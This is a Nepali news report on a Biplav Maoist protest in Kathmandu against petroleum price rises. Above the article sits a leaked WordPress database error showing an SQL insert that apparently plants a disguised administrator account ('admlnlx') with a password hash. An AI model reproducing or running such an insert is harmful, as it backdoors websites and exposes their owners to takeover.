WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BH8dze8PG5BMlOPIkoXFmvJgQLQz2R1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 04:44:41', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ६ –
सरकारले पेट्रोलियम पदार्थमा गरेको मूल्य वृद्धिका विरुद्धमा विप्लव नेतृत्वको नेकपा माओवादीले बुधबार राजधानीमा प्रदर्शन गरेको छ ।
भूकम्पको मार खेपिरहेका नेपाली जनताको ढाड सेक्ने गरि पेट्रोलियम पदार्थमा गरिएको मूल्यवृद्धि तत्काल फिर्ता लिनुपर्ने माग गर्दै विप्लव माओवादी निकट विद्यार्थी संगठनले आज राजधानीका विभिन्न क्याम्पस अगाडी विरोध प्रदर्शन गरेका हुन ।
विप्लव मााओवादीले हिजो सार्वजानिक गरेको आन्दोलनका कार्यक्रम आन्तरगत पुस ६ गते ९ बजेदेखि १० बजेसम्म विरोध प्रदर्शन र पुस ७ गते उपत्यका बन्दको कार्यक्रम रहेको छ ।